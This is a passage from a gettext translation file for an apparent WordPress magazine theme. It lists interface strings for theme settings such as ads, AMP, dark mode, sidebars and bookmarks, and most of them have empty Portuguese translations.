backend/panels/header.php:573 msgid "" "Adding a custom logo for the login form. Leave blank to set it as the " "default." msgstr "" #: backend/panels/socials.php:16 msgid "Adding social profiles for your website." msgstr "" #: backend/panels/login.php:140 msgid "Admin Bar" msgstr "" #: backend/panels/ads.php:15 msgid "Ads & Slide Up" msgstr "" #: backend/panels/ads.php:30 msgid "Adsense - Auto Ads" msgstr "" #: backend/single-metaboxes.php:554 msgid "advantage item" msgstr "" #: backend/single-metaboxes.php:546 msgid "Advantages" msgstr "" #: backend/configs.php:378 msgid "After Entry Category" msgstr "" #: templates/entry.php:651 msgid "Ago" msgstr "" #: backend/panels/blog-pages.php:1510 msgid "" "Ajax pagination is only available for the tag. The theme will fallback to " "the numeric type for other archive pages." msgstr "" #: backend/panels/header.php:636 backend/panels/header.php:651 msgid "Alert Bar" msgstr "" #: backend/panels/header.php:666 msgid "Alert Content" msgstr "" #: backend/panels/header.php:673 msgid "Alert URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2482 #, php-format msgid "All (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 #: backend/panels/amp.php:424 backend/panels/amp.php:485 #: backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "Postagens" #: backend/panels/header.php:610 msgid "" "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You " "can set an individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or " "advert content." msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is " "enabled." msgstr "" #: backend/panels/page.php:75 msgid "" "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/bookmark.php:665 msgid "" "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is " "added will be corresponding to a column." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the " "best performance of your website.." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. " "Google will automatically show ads on your AMP pages at optimal times when " "they are likely to perform well and provide a good experience." msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are " "likely to perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 #: backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid "Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:350 msgid "" "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/panels/design.php:355 msgid "" "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your " "website. This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/single-post.php:488 msgid "" "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without " "special charsets and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to " "set as the desktop navigation colors." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "Comentários" #: comments.php:32 msgid "Comments are closed." msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 #: backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/design.php:331 msgid "Create a New Crop Size" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 #: backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS " "usages, plugin scripts etc..." msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/category-settings.php:469 